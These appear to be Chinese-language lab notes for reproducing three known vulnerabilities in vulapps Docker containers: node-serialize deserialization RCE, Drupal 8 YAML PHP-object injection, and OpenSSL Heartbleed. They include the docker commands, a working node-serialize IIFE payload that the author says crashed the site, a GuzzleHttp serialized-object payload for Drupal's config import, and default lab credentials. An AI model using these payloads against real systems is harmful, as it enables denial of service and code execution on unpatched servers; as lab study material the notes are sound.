漏洞1 Node.jsnode-serialize 反序列化
• Node.js存在反序列化远程代码执行漏洞,Node.js的node-serialize库中存在一个漏洞,该漏洞通过传输JavaScript IIFE,利用恶意代码(未信任数据)达到反序列化远程任意代码执行的效果。并且Nodejs服务端必须存在接收序列化的数据接口。
• docker pull medicean/vulapps:n_nodejs_1
• docker run -d -p 1010:80 medicean/vulapps:n_nodejs_1
• 账户随意输入,在密码处输入
_$$ND_FUNC$$_function (){for(var start =+new Date; +new Date - start <= sleepTime; ) {}}(sleepTime=15000)
• 漏洞说明https://www.zhihu.com/question/55860542/answer/146625023
速度很快就出来了
一直在刷新,产生ddos效果,在试的时候网站已经挂了
• 该漏洞是由于DrupalCore的YAML解析器在处理不安全的PHP对象句柄时,通过远程代码执行,进行高危行为操作;
• 漏洞检测
• 登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞;
• docker pull medicean/vulapps:d_drupal_1
• docker run -d -p 2000:80 medicean/vulapps:d_drupal_1
• 登录后台访问
• http://ip:port/admin/config/development/configuration/single/import
admin/admin123
输入
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
• Heartbleed OpenSSL CVE-2014-0160(心脏出血)
• CVE-2014-0160,心脏出血漏洞,是一个非常严重的OpenSSL 漏洞。这个漏洞使得攻击者可以从存在漏洞的服务器上读取64KB大小的内存信息。这些信息中可能包含非常敏感的信息,包括用户请求、密码甚至证书的私钥。
• 据称,已经有攻击者在某宝上尝试使用漏洞读取数据,在读取200次后,获取了40多个用户名和7个密码。
• 下载
• docker pull medicean/vulapps:o_openssl_heartbleed
• 启动
• docker run -d -p 2020:443 medicean/vulapps:o_openssl_heartbleed
• https://github.com/akhld/heartbleed
• 图形化工具
• 在线检测http://fish.ijinshan.com/checkopenssl/check